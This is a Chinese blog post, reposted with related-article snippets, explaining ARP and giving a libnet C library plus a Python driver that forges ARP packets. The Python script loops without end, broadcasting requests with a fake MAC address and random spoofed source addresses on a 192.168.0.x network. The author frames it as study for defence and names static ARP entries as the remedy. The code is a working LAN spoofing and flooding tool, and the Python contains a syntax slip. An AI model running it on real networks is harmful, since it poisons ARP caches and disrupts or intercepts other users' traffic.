ARP数据包伪造

最新推荐文章于 2022-11-05 14:38:55 发布
最新推荐文章于 2022-11-05 14:38:55 发布
阅读量262 收藏
点赞数
文章标签: 操作系统 python
原文链接:http://www.cnblogs.com/SwordTao/p/3640146.html
版权

 

  一台网络中的计算机,其传递到网络中的数据包的内容是完全由其软硬件逻辑决定的,软件可以操控硬件,硬件亦是一种特殊的软件,所以,接收者只根据数据包的内容,绝不可能判定此数据包的真正来源,一切都是可以伪造的。 

  网络系统功与防的矛盾斗争,可以使得我们更加快速的发现并修补系统漏洞,而且这种矛盾关系必然存在。

  人外有人,天外有天。

  攻的最高境界便是不战,是和平。

  静态arp表项轻松破解ARP伪造报文的攻击。我们研究伪造报文的目的在于深刻理解系统以更好地防御,而非攻击。

 

 

 

  ARP : Address Resolution Protocol,地址解析协议,其基本功能为通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。它是IPv4中网络层必不可少的协议,不过在IPv6中已不再适用,并被邻居发现协议(NDP)所替代。

——维基百科

  基础资料推荐:《TCP-IP详解 卷1:协议》《ARP协议简介 

  需要注意,书中阐述的大多数arp缓存更新规则对现代操作系统已经不再适用,试想,一次ARP广播就可以更新当前局域网中所有主机的arp缓存条目,这是多么大的系统漏洞?一轮ARP伪造报文的攻击,便能使这个局域网主机之间的通讯陷入瘫痪。所以,现代操作系统采取了更加保守的arp缓存更新规则,上图已在Win7-64位操作系统与Linux 2.6.32内核上获得验证。

  一台网络中的计算机,其传递到网络中的数据包的内容是完全由其软硬件逻辑决定的,软件可以操控硬件,硬件也是一种特殊的软件,所以,接收者只根据数据包的内容,绝不可能判定此数据包的真正来源,一切都是可以伪造的。

  操作系统与硬件具有构造数据包的能力,当操作系统把这种能力以系统调用的方式提供给编程者时,则,编程者亦拥有了构造任意数据包的能力。

  而Libnet又对这些系统调用进行了又一次的逻辑封装,将这些能力以更加容易使用的方式展露出来,以加快应用程序的开发速度。

  实验环境为GNU/Linux,以太网,主机应已安装libnet。

ForgeArp.c
 1 //// # gcc ForgeArp.c -lnet -shared -fPIC -o ForgeArp.so
 2 #include <stdio.h>
 3 #include <stdlib.h>
 4 #include <string.h>
 5 #include <unistd.h>
 6 #include <libnet.h>
 7 #define MAC_ADDR_LEN 6
 8 #define IP_ADDR_LEN 4
 9 int ForgeAndSendArp(char * dev,unsigned char * src_mac,unsigned char * dst_mac,
10                          char * src_ip_str,char *dst_ip_str,uint16_t arpOp,unsigned int sendTimes
11                         )
12 {
13         libnet_t *net_t = NULL; 
14         unsigned long src_ip,dst_ip = 0;        
15         char err_buf[LIBNET_ERRBUF_SIZE];
16         libnet_ptag_t p_tag; 
17         unsigned int i=0;
18         src_ip = libnet_name2addr4(net_t,src_ip_str,LIBNET_RESOLVE);
19         if (src_ip==-1)
20             {
21             printf("error: libnet_name2addr4 src_ip \n");
22             return 1;
23             }
24         dst_ip = libnet_name2addr4(net_t,dst_ip_str,LIBNET_RESOLVE);
25         if (dst_ip==-1)
26             {
27             printf("error: libnet_name2addr4 dst_ip \n");
28             return 1;
29             }
30 
31         printf("the src_ip_str is %s,uint32 src_ip is %d\n",src_ip_str,src_ip);
32         printf("the dst_ip_str is %s,uint32 dst_ip is %d\n",dst_ip_str,dst_ip);
33         
34         net_t  = libnet_init(LIBNET_LINK_ADV, dev, err_buf);     
35         if(net_t == NULL)
36         {
37                 printf("libnet_init error\n");
38                 return 2;
39         }
40 
41         p_tag = libnet_build_arp(
42                         ARPHRD_ETHER,//hardware type ethernet
43                         ETHERTYPE_IP,//protocol type
44                         MAC_ADDR_LEN,//mac length
45                         IP_ADDR_LEN,//protocol length
46                         arpOp,//op type
47                         (u_int8_t *)src_mac,//source mac addr
48                         (u_int8_t *)&src_ip,//source ip addr
49                         (u_int8_t *)dst_mac,//dest mac addr
50                         (u_int8_t *)&dst_ip,//dest ip  addr
51                         NULL,//payload
52                         0,//payload length
53                         net_t,//libnet context
54                         0//0 stands to build a new one
55         );
56         
57         if(-1 == p_tag)
58         {
59                 printf("libnet_build_arp error\n");
60                 libnet_destroy(net_t);
61                 return 3;
62         }
63 
64         p_tag = libnet_build_ethernet(//create ethernet header
65                         (u_int8_t *)dst_mac,//dest mac addr
66                         (u_int8_t *)src_mac,//source mac addr
67                         ETHERTYPE_ARP,//protocol type
68                         NULL,//payload
69                         0,//payload length
70                         net_t,//libnet context
71                         0//0 to build a new one
72         );
73 
74         if(-1 == p_tag)
75         {
76                 printf("libnet_build_ethernet error!\n");
77                 libnet_destroy(net_t);
78                 return 4;
79         }
80         
81         int res;
82         i=0;
83         for(;i<sendTimes;i++)
84           if(-1 == (res = libnet_write(net_t)))
85           {
86                 printf("libnet_write error!\n");
87                 libnet_destroy(net_t);
88                 return 5;
89           }
90         
91         libnet_destroy(net_t);
92         return 0;
93 FAIL:        
94         libnet_destroy(net_t);
95                 return 6;
96 }

  我们已经将ForgeArp功能编译成了shared object,接下来Python入场。

forgeArpTest.py
 1 """
 2 int ForgeAndSendArp(char * dev,unsigned char * src_mac,unsigned char * dst_mac,
 3             char * src_ip_str,char *dst_ip_str,uint16_t arpOp,unsigned int sendTimes
 4            )
 5 """
 6 import time
 7 import random
 8 from ctypes import *
 9 arpLib=CDLL('./ForgeArp.so')
10 
11 def MacTran(macStr):
12     MacType= c_ubyte * 6
13     macStr=macStr.translate(None,":")
14     return MacType(int(macStr[0:2],16),int(macStr[2:4],16),int(macStr[4:6],16),\
15                    int(macStr[6:8],16)int(macStr[8:10],16),int(macStr[10:12],16))
16 while True:
17     lis=["192.168.0."]
18     lis.append(str(int(random.random()*1000/4)))
19     if lis[1]=='36':
20         continue
21     arpLib.ForgeAndSendArp("eth0",MacTran("66:66:66:66:66:66"),MacTran("FF:FF:FF:FF:FF:FF") \
22                         ,''.join(lis),"192.168.0.1",c_ushort(1),c_uint(2))
23     time.sleep(1)
24 
25 print ":)"

  关于ForgeAndSendArp函数中arpOp参数的选项如下:

// 源码头文件
libnet-1.2-rc3\include\libnet\libnet-headers.h 
1 // 仅摘部分内容
2   uint16_t ar_op;          /* operation type */
3 #define ARPOP_REQUEST    1  /* req to resolve address */
4 #define ARPOP_REPLY      2  /* resp to previous request */
5 #define ARPOP_REVREQUEST 3  /* req protocol address given hardware */
6 #define ARPOP_REVREPLY   4  /* resp giving protocol address */
7 #define ARPOP_INVREQUEST 8  /* req to identify peer */
8 #define ARPOP_INVREPLY   9  /* resp identifying peer */

   代码测试无误。

 

  静态arp表项轻松破解ARP伪造报文的攻击。我们伪造报文的目的在于深刻理解系统以更好地防御,而非攻击。

   如有问题或者优化建议,欢迎讨论!

 

 

 

 

 

 

转载于:https://www.cnblogs.com/SwordTao/p/3640146.html

dayeti3883
关注
伪造ARP封包对应的代码
02-22
基于ARP协议,参考他人的代码, 整理出对应的代码和python脚本,压缩包包含的问题: 1. ForgeARP.c so文件对应的源码, 编译命令参考c文件开头注视 2. ForgeARP.so 由c生成的so文件, 3. forgeArpTest.py 基于Python脚本调用so中的函数。
arp数据包生成器
02-14
3. **嗅探和拦截**:一些ARP数据包生成器还具备监听网络流量的能力,可以捕获和分析经过的ARP数据包,帮助识别异常活动。 4. **网络诊断**:通过发送特定的ARP数据包,可以测试网络连接的稳定性,查找可能存在的ARP...
ARP攻击模拟
qq_43698421的博客
09-21 613
1 理论 1.1 原理 ARP攻击主要是通过伪造IP地址和MAC地址进行欺骗。假设A、B、C位于同一局域网内,A是PC主机,B是攻击主机,C是路由器。攻击过程如下: A将包含目标IP地址(10.0.1.1)信息的ARP Request,广播到网络中的所有主机,源主机A的IP地址和MAC地址都包括在ARP请求中; C确定ARP请求中的IP地址与自己的IP地址匹配,则将主机A的IP地址和MAC地址映射添加到本地ARP缓存中;并将包含其MAC地址的ARP回复消息直接发送回主机A; 当主机A收到从C发来的ARP
21.如何伪造ARP响应?
CodeAllen嵌入式
05-27 1097
正常情况下,向目标主机发送 ARP 请求,如果主机存在,将会得到一个 ARP 响应;如果主机不存在,将不会得到 AR P响应。 伪造 ARP 响应是指伪造一个不存在的主机的 ARP 响应。例如,黑客在攻击局域网中的主机时,会扫描局域网中的所有主机,然后对发现的主机实施攻击。如果伪造ARP 响应包,会误导黑客以为扫描到的主机是存在的,从而起到了迷惑作用。 伪造 ARP 响应需要使用 netwox 工具中编号为 73 的模块。 【示例】以主机 A 为基础实施伪造 ARP 响应,伪造模拟主机 192.168.
网络协议-ARP协议与攻击模拟
qq_43381463的博客
10-18 1034
网络协议-ARP协议与攻击模拟
ARP.rar_ARP包解析_解析ARP数据包
09-24
本项目旨在通过编程方式捕获并解析网络中的ARP数据包,以便深入理解网络通信的底层机制。 在ARP协议中,当一个设备想要发送数据给另一个设备但只知道其IP地址时,它会广播一个ARP请求,询问哪个设备拥有特定的IP...
解析ARP数据包---计算机网络课程设计.doc
06-27
"解析ARP数据包---计算机网络课程设计" ARP(Address Resolution Protocol)是一种将IP地址解析为MAC地址的协议,在计算机网络中扮演着重要的角色。本文将对ARP协议的概念、工作原理、ARP攻击的基本原理、ARP数据包...
Python程序设计:数据包伪造.pptx
06-13
**Python程序设计:数据包伪造** 在网络安全领域,数据包伪造是一种常见的攻击手段,通过这种方法,黑客可以隐藏自己的真实身份,使目标主机无法准确追踪到攻击源。在Python中,Scapy库为我们提供了伪造数据包的...
采集ARP数据包,标注第2,4,6ARP数据报文字段信息
10-18
标题提到的“采集ARP数据包,标注第2,4,6ARP数据报文字段信息”是一项网络数据获取与协议分析的实验任务,旨在深入理解地址解析协议ARP的工作机制及其在网络安全中的作用。ARP是Address Resolution Protocol的缩写...
什么是ARP欺骗
热门推荐
jasonj333
05-05 1万+
ARP欺骗的本质是把虚假的IP-MAC映射关系通过ARP报文发给主机,让主机把虚假的IP-MAC映射存入ARP缓存表(可能是IP地址错误,也可能是MAC地址错误),让其无法正确发送数据 漏洞的根源 ARP协议是无连接 操作系统收到ARP请求或响应后无法确认senderMAC和senderIP真假 ARP欺骗 伪造网关 攻击者B伪造ARP报文(senderIP地址是网关的,senderMAC地址不是网关的),发送给网段内的主机A,那么主机A就会把网关的ip地址和伪造的mac地址缓存到arp缓.
ARP欺骗
m0_64005272的博客
11-05 5902
如果不存在,则向本网络上每一个主机广播一个ARP请求报文,其意义是"如果你有此IP地址,请告诉我你的MAC地址",目的主机收到此请求包后,发送一个ARP响应报文,本机收到此响应后,把相关信息记录在ARP高速缓存中,以下的步骤同上。那么被欺骗主机的ARP高速缓存,被假冒者的IP地址与其MAC地址的对应关系就会更改为欺骗者的,从而达到ARP欺骗的目的。特别的,如果攻击者冒充网关,将转发子网内到外网的所有通信量,以达到捕获其他主机的通信量,从而破坏数据传输的保密性。接下来打开arp转发命令,进行arp欺骗。
ARP伪造使用抓包工具进行ARP欺骗arp伪造攻击
cbc_19的博客
09-21 3583
ARP 在局域网中,网络以“帧”的形式传输数据,一个主机要和另一个主机进行直接通信,就必须要知道目标主机的MAC地址。显然,在双方通信之初,发送方是无法知道目标主机的MAC地址的。那么,目标主机的MAC地址,它就是通过“地址解析协议”获得的。所谓的“地址解析”就是主机在发送“帧”之前,将目标主机的“IP地址”转换成目标主机的“MAC地址”的过程。
s9303这样的arp表是代表什么意思?
weixin_33949359的博客
10-18 620
s9303这样的arp表是代表什么意思? 在s9303交换机下dis arp 看到了最末2条有这样的记录 那个Incomplete 是什么意思呢?   答: 如果该字段显示为“Incomplete”,表示当前表项为ARP假表项。ARP假表项是为了防止ARP Miss消息频繁上报上层软件,造成大量的系统资源浪费在处理ARP Miss消息上,由系统自动生成的临时代替ARP表项的假表项。 为了防止...
libnet--arp/arp应答
程序狗的成长之路
08-14 766
ARP广播包: #include int main() {     libnet_t *handle;        /* Libnet句柄 */     int packet_size;     char *device = "eth0";   /* 设备名字,也支持点十进制的IP地址,会自己找到匹配的设备 */     u_int8_t *src_ip_str = "
linux函数表,libnet 函数列表
weixin_30767365的博客
05-03 162
libnet提供的接口函数按其作用可分为四类:* 内存管理(分配和释放)函数* 地址解析函数* 数据包构造函数* 数据包发送函数以下分别列出这些接口函数及其功能(其参数含义简单易懂,不再解释):★内存管理函数单数据包内存初始化:int libnet_init_packet(u_short packet_size, u_char **buf);单数据包内存释放:void libnet_destroy...
linux c t添加arp表,Ubuntu下C语言+libnet实现ARP数据包广播
weixin_35080040的博客
05-10 422
近来学校宿舍楼ARP攻击一直很猖獗,而且大多数是主机欺骗型ARP攻击。每次攻击都要至少半天整栋宿舍楼上不去网(我们这边每栋宿舍楼划分一个网段,像我们楼就是10.1..23.254/22)。我曾经抓到过ARP攻击数据包,局域网遭受攻击的时候被我逮了个正着:某台主机广播一个ARP数据包,内容是10.1.23.254 is at xxxxxxxx(即错误的网关MAC,我们的网关是10.1.23.254)...
ARP报文伪造网关
tiaohua的专栏
10-13 2942
实验要求:两台主机,一台主机A使用IRIS,伪造ARP REPLY报文,令另一台主机B无法与它的网关通信。实验环境:主机A:IP地址:192.168.1.6MAC地址:主机B:IP地址:192.168.1.3MAC地址:两主机网关:IP地址:192.168.1.1MAC地址:实验步骤:1.在主机A上使用arp -d命令清除ARP缓存。2.
伪造ARP数据包的硬件地址长度和协议地址长度必须是6和4嘛
最新发布
05-25
ARP协议规定了硬件地址和协议地址的长度分别为6和4,但是某些特定情况下可以使用不同长度的硬件地址和协议地址。例如,RFC 5494中定义了一种称为InARP的协议,它使用了8字节的硬件地址和4字节的协议地址。另外,某些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值